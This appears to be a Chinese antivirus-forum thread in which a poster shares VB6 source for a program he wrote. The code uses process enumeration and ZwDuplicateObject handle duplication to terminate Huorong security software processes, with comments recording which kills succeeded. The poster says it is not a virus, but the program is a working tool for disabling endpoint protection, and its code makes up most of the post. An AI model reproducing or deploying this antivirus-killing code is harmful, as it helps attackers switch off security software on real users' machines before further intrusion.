样本64

sexing

kis 2015.0.2.361（h）miss

心心相印

智量miss

skystars

注：这是我做的程序

skystars

skystars 发表于 2019-2-24 13:03
注：这是我做的程序

原帖在这里：http://bbs.huorong.cn/thread-54732-1-1.html
这不是病毒，只是会关闭hipstray.exe和hipsmain.exe。win10有些电脑不会关闭，有些会关闭。我重装了系统，关不掉了。注：火绒论坛的Skystars是我。
源代码：
Option Explicit
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function ZwDuplicateObject _
Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _
ByVal SourceHandle As Long, _
ByVal TargetProcessHandle As Long, _
ByRef TargetHandle As Long, _
ByVal DesiredAccess As Long, _
ByVal HandleAttributes As Long, _
ByVal Options As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 1024
End Type
Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Dim pid As Long
Dim pname As String
Dim a As String
Function FcOpenProcess&(p&)
Dim ProcessHandle As Long
Dim Rtn As Long
ProcessHandle = OpenProcess(&H400, 0, p)
If ProcessHandle <> 0 Then
Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1)
FcOpenProcess = ProcessHandle
End If
End Function
Private Sub Command1_Click()
killsd ("hipstray.exe") '结束成功
killsd ("usysdiag.exe") '失败
killsd ("hipsmain.exe") '成功
killsd ("hipsdaemon.exe") '失败
killsd ("wsctrl.exe") '失败
End Sub
Private Function killsd(program As String)
Dim ProcessHandle As Long
a = Trim(LCase(program))
Dim my As PROCESSENTRY32
Dim l As Long
Dim l1 As Long
Dim flag As Boolean
Dim mName As String
Dim i As Integer
l = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
If l Then
my.dwSize = 1060
End If
If (Process32First(l, my)) Then
Do
i = InStr(1, my.szExeFile, Chr(0))
mName = LCase(Left(my.szExeFile, i - 1))
If mName = a Then
pid = my.th32ProcessID
ProcessHandle = FcOpenProcess&(pid)
TerminateProcess ProcessHandle, 0
End If
Loop Until (Process32Next(l, my) < 1)
End If
End Function
这是源代码。